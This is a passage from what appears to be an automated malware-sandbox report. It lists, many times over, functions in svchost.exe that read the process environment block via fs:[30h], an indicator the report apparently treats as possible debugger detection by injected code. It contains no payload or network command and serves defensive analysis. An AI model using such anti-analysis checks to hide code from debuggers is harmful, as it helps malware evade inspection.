                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]2_2_03972750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4755 mov eax, dword ptr fs:[00000030h]2_2_039B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov esi, dword ptr fs:[00000030h]2_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]2_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]2_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938770 mov eax, dword ptr fs:[00000030h]2_2_03938770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039666B0 mov eax, dword ptr fs:[00000030h]2_2_039666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C6A6 mov eax, dword ptr fs:[00000030h]2_2_0396C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0396A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov eax, dword ptr fs:[00000030h]2_2_0396A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972619 mov eax, dword ptr fs:[00000030h]2_2_03972619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE609 mov eax, dword ptr fs:[00000030h]2_2_039AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E627 mov eax, dword ptr fs:[00000030h]2_2_0394E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03966620 mov eax, dword ptr fs:[00000030h]2_2_03966620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968620 mov eax, dword ptr fs:[00000030h]2_2_03968620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393262C mov eax, dword ptr fs:[00000030h]2_2_0393262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394C640 mov eax, dword ptr fs:[00000030h]2_2_0394C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03962674 mov eax, dword ptr fs:[00000030h]2_2_03962674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E59C mov eax, dword ptr fs:[00000030h]2_2_0396E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov eax, dword ptr fs:[00000030h]2_2_03932582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov ecx, dword ptr fs:[00000030h]2_2_03932582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964588 mov eax, dword ptr fs:[00000030h]2_2_03964588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039365D0 mov eax, dword ptr fs:[00000030h]2_2_039365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039325E0 mov eax, dword ptr fs:[00000030h]2_2_039325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6500 mov eax, dword ptr fs:[00000030h]2_2_039C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA49A mov eax, dword ptr fs:[00000030h]2_2_039EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039644B0 mov ecx, dword ptr fs:[00000030h]2_2_039644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BA4B0 mov eax, dword ptr fs:[00000030h]2_2_039BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039364AB mov eax, dword ptr fs:[00000030h]2_2_039364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039304E5 mov ecx, dword ptr fs:[00000030h]2_2_039304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A430 mov eax, dword ptr fs:[00000030h]2_2_0396A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C427 mov eax, dword ptr fs:[00000030h]2_2_0392C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA456 mov eax, dword ptr fs:[00000030h]2_2_039EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392645D mov eax, dword ptr fs:[00000030h]2_2_0392645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395245A mov eax, dword ptr fs:[00000030h]2_2_0395245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC460 mov ecx, dword ptr fs:[00000030h]2_2_039BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]2_2_03940BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]2_2_03940BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]2_2_039E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]2_2_039E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEBD0 mov eax, dword ptr fs:[00000030h]2_2_039DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EBFC mov eax, dword ptr fs:[00000030h]2_2_0395EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BCBF0 mov eax, dword ptr fs:[00000030h]2_2_039BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]2_2_0395EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]2_2_0395EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]2_2_039F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]2_2_039F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEB50 mov eax, dword ptr fs:[00000030h]2_2_039DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]2_2_039E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]2_2_039E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]2_2_039C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]2_2_039C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FAB40 mov eax, dword ptr fs:[00000030h]2_2_039FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D8B42 mov eax, dword ptr fs:[00000030h]2_2_039D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392CB7E mov eax, dword ptr fs:[00000030h]2_2_0392CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968A90 mov edx, dword ptr fs:[00000030h]2_2_03968A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04A80 mov eax, dword ptr fs:[00000030h]2_2_03A04A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]2_2_03938AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]2_2_03938AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986AA4 mov eax, dword ptr fs:[00000030h]2_2_03986AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930AD0 mov eax, dword ptr fs:[00000030h]2_2_03930AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]2_2_03964AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]2_2_03964AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]2_2_0396AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]2_2_0396AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BCA11 mov eax, dword ptr fs:[00000030h]2_2_039BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]2_2_03954A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]2_2_03954A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA38 mov eax, dword ptr fs:[00000030h]2_2_0396CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA24 mov eax, dword ptr fs:[00000030h]2_2_0396CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EA2E mov eax, dword ptr fs:[00000030h]2_2_0395EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]2_2_03940A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]2_2_03940A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]2_2_039ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]2_2_039ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEA60 mov eax, dword ptr fs:[00000030h]2_2_039DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov esi, dword ptr fs:[00000030h]2_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]2_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]2_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
